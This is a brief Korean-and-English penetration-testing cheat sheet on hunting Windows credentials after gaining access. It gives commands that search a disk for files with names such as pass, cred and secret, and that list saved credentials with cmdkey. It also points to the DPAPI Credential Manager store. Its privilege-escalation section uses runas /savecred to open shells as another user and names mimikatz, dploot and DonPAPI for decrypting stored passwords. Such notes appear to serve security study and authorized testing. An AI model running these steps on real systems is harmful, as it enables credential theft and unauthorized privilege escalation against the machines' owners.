비밀번호 찾기 ```powershell dir /s *pass* 2>nul dir /s *cred* 2>nul dir /s *secret* 2>nul dir /s *.xml 2>nul dir /s *.rdp 2>nul dir /s *.ps1 2>nul ``` ```powershell cmdkey /list # 혹은 Control Panel > User Accounts > Credential Manager # 아래 경로에 Credential Manager가 DPAPI 유저 키를 이용해 암호화하고 저장한 계정 정보가 있다 # 이를 복호화 하기 위해선 추가적인 도구가 필요. C:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Credentials ``` ### Privilege Escalation There are two ways to escalate our privileges using credentials inside the Credential Manager: ```powershell # 1. Create a session, run cmd.exe using the found credentials runas /savecred /u:<USER> "cmd.exe" runas /savecred /u:<USER> "powershell.exe" # 2. Gain passwords in plaintext through decryption with DPAPI mimikatz, dploot, DonPAPI ```